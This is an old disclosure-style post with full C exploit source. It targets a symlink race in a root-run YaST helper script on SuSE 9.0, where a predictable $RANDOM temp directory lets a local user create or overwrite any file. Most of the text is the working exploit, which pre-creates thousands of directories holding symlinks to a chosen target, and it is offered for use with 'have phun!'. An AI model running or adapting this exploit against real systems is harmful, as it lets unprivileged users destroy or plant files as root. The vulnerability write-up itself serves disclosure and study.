Author: l0om <l0om@excluded.org>  
 Date: 12.01.2004 
 page: www.excluded.org  
 
 SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem  
  
 There is a symlink problem in the 
SuSEconfig.gnome-filesystem  
 scribt. a normal user can creat and overwrite every 
file  
 on the system. This script gets executed after a 
configuration change by the  
setup tool YaST. So if you have installed gnome or 
parts of gnome check this out. 
  
  
 When this scribt gets executed by YaST after a  
 configuration change it does the following:  
  
 TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM  
 mkdir $TEMP  
 touch $TEMP/list  
 [...]  
 echo >$TEMP/found  
 [...]  
  
 the env variable $RANDOM includes a random number. 
in my tests  
 this number goes up from 1 to 33000. But also if it 
goes up to  
 65535 it is still vul. to a symlink attack. this is 
nearly as  
 bad as the symlink problem which has been found on 
SuSE 8.2.  
 On 8.2 a SuSEconf scribt has created a link with the 
$$ at the  
 file end.  
  
 I have used a little exploit written in C which 
creats the  
 directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" 
up to  
 33000. in every directory i have created a symlink 
to a file  
 which i want to creat or to overwrite. as the 
filename i have  
 taken the $TEMP/found and let it point to some file. 
in my test i  
 have taken the /etc/nologin- and hey- it has worked!  
  
 have phun!  
  
  
*******************************************************************/  
  
 #include <stdio.h>  
 #include <unistd.h>  
 #include <string.h>  
  
 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."  
 #define START 1  
 #define END 33000  
  
 int main(int argc, char **argv)  
 {  
 int i;  
 char buf[150];  
  
 printf("\tSuSE 9.0 YaST script 
SuSEconfig.gnome-filesystem exploit\n");  
 printf("\t-------------------------------------------------------------
\n");  
 printf("\tdiscovered and written by l0om 
<l0om@excluded.org>\n");  
 printf("\t WWW.EXCLUDED.ORG\n\n");  
  
 if(argc != 2) {  
 printf("usage: %s <destination-file>\n",argv[0]);  
 exit(0xff);  
 }  
  
 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);  
 read(1, buf, 1); fflush(stdin);  
  
 umask(0000);  
 printf("working\n\n");  
 for(i = START; i < END; i++) {  
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);  
 if(mkdir(buf,00777) == -1) {  
 fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);  
 exit(0xff);  
 }  
 if(!(i%1000))printf(".");  
 strcat(buf, "/found");  
 if(symlink(argv[1], buf) == -1) {  
 fprintf(stderr, "cannot creat symlink from %s to %s 
[Nr.%d]\n",buf,argv[1],i);  
 exit(0xff);  
 }  
 }  
 printf("\ndone!\n");  
 printf("next time the SuSE.gnome-filesystem script 
gets executed\n");  
 printf("we will create or overwrite file %s
\n",argv[1]);  
 return(0x00);  
 }  /* i cant wait for the new gobbles comic!! */